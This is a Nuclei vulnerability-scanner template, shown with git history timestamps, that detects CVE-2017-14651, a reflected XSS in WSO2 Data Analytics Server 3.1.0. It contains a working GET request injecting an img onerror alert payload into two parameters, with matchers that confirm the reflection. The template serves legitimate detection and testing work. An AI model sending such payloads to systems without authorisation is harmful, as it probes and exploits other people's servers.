nuclei-templates/cves/2017/CVE-2017-14651.yaml

28 lines
836 B
YAML
Raw Normal View History

2021-08-06 14:46:35 +00:00
id: CVE-2017-14651
2021-08-05 16:59:36 +00:00
info:
2021-08-06 14:46:35 +00:00
name: Reflected XSS - WSO2 Data Analytics Server
2021-08-05 16:59:36 +00:00
author: mass0ma
severity: medium
2021-08-06 14:46:35 +00:00
description: WSO2 Data Analytics Server 3.1.0 has XSS in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.
tags: cve,cve2017,wso2,xss
2021-08-05 16:59:36 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=alert(document.domain)>"
2021-08-06 14:46:35 +00:00
- "Failed to add new collection"
2021-08-05 16:59:36 +00:00
part: body
condition: and
2021-08-06 14:46:35 +00:00
- type: word
words:
- "text/html"
part: header